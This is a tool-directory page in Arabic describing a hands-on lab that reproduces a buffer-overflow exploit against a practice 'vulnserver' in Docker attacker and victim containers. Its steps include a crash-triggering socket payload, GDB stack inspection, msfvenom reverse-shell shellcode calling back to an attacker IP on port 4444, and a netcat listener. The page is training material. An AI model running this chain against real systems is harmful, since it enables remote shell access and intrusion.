Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-22457-vulnserver-lab — مختبر عملي لإعادة إنتاج CVE-2025-22457: يقوم بإعداد حاويات Docker للمهاجم/الضحية، ويجد عناوين المكدس باستخدام GDB، وينفذ استغلال reverse shell عبر msfvenom. | Kitploit
أدوات/GitHubGitHub/donofly/cve-2025-22457-vulnserver-lab
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كودCTFاختبار الاختراقالتعلم والتعليماستغلال الملفات الثنائيةمختبرات وتدريب عملي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
GitHubdonofly/cve-2025-22457-vulnserver-lab

CVE-2025-22457-vulnserver-lab

مختبر عملي لإعادة إنتاج CVE-2025-22457: يقوم بإعداد حاويات Docker للمهاجم/الضحية، ويجد عناوين المكدس باستخدام GDB، وينفذ استغلال reverse shell عبر msfvenom.

عرض المستودع
منذ 21س 3دلم تتم المراجعة بعد
مشاركة

step 1 إعداد البيئة

الصلاحيات وتنفيذ السكربت

إذا كنت تستخدم Windows يمكنك فتح wsl للتنفيذ

root@kitploit:~
chmod +x setup_environment.sh
./setup_environment.sh

step 2: البحث عن القيم الديناميكية (خطوات يدوية مطلوبة)

نظرًا لأن عناوين الذاكرة وعنوان IP ديناميكيان في بيئات مختلفة، يجب العثور عليهما يدويًا وتحديث سكربت exploit.py.

2.0 افتح أولاً حاويتي attacker وحاوية victim واحدة كتحضير لاحق

root@kitploit:~
docker exec -it atac /bin/bash
docker exec -it vic /bin/bash

2.1 البحث عن stack_address (عنوان العودة)

هدف هذه الخطوة هو العثور على عنوان مكدس مستقر حتى يتمكن payload الخاص بنا من القفز بدقة.

1. تشغيل GDB في حاوية victim
root@kitploit:~
gdb ./vulnserver
2. تعيين نقطة توقف بعد دالة strcpy
root@kitploit:~
(gdb) b strcpy
3. تشغيل البرنامج، يبدأ vulnserver في الاستماع
root@kitploit:~
(gdb) run

إثارة نقطة التوقف: باستخدام حاوية attacker، نفّذ الأمر التالي لإرسال payload تجريبي. سيؤدي هذا إلى توقف GDB عند نقطة التوقف. ملاحظة: استبدل <VICTIM_IP> بعنوان IP الخاص بـ Victim الظاهر في الخطوة الأولى.

root@kitploit:~
python3 -c 'import socket; s = socket.socket(); s.connect(("<VICTIM_IP>", 9999)); s.send(b"A"*516 + b"BBBB" + b"C"*300); s.close()'

العثور على العنوان وتسجيله: عد إلى نافذة الطرفية التي يعمل فيها GDB، يجب أن يكون البرنامج قد توقف. نفّذ الأمر التالي لفحص المكدس:

root@kitploit:~
(gdb) x/200wx $esp

في المخرجات، ابحث عن منطقة مكونة من 0x43434343 (تمثل 'C'). اختر عنوانًا عشوائيًا من منتصف هذه المنطقة (مثل 0xffffd580) وانسخه. هذا هو stack_address.

2.2 تحديث exploit.py وإنشاء buf (Shellcode)

تحديث stack_address:

استخدم محرر نصوص لتحديث stack_address في exploit.py إلى العنوان الذي نسخته للتو

إنشاء وتحديث buf (Shellcode):

في shell حاوية attacker، نفّذ أمر msfvenom لإنشاء shellcode. ملاحظة: استبدل <ATTACKER_IP> بعنوان IP الخاص بـ Attacker الظاهر في الخطوة الأولى.

root@kitploit:~
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=4444 -b '\x00' -f python

انسخ كامل كود buf = b""... الذي أخرجه msfvenom، واستخدمه لاستبدال جزء متغير buf الموجود في ملف exploit.py بالكامل.

step 3 : تنفيذ الهجوم

تشغيل المستمع: في نافذة shell لإحدى حاويات attacker، نفّذ الأمر التالي لتشغيل مستمع netcat.

root@kitploit:~
nc -lvnp 4444

فتح الاتصال في victim:

يمكن استخدام الطريقتين التاليتين الطريقة الأولى

root@kitploit:~
./vulnserver

الطريقة الثانية

root@kitploit:~
gdb ./vulnserver
gef➤  run

تنفيذ سكربت الهجوم: شغّل exploit.py المحدّث في حاوية attacker. (ملاحظة: استبدل <victim_ip> بعنوان IP الخاص بـ victim الظاهر في الخطوة الأولى)

root@kitploit:~
python3 exploit.py <victim_ip>

التحقق من النتيجة: بدّل مرة أخرى إلى نافذة مستمع netcat. إذا سار كل شيء على ما يرام، سترى اتصالاً قد تم إنشاؤه والحصول على shell تفاعلي. يمكنك إدخال أوامر مثل whoami و ls -la للتحقق.

step 4 : تنظيف البيئة

الخروج من GDB والحاويات:
root@kitploit:~
اكتب quit في GDB، ثم اكتب exit في shell الحاوية.

يمكن تنفيذ الأوامر التالية لإيقاف وتنظيف جميع الحاويات والشبكات.

root@kitploit:~
docker stop vic atac
docker network rm 111550082_net
تنزيل الأداة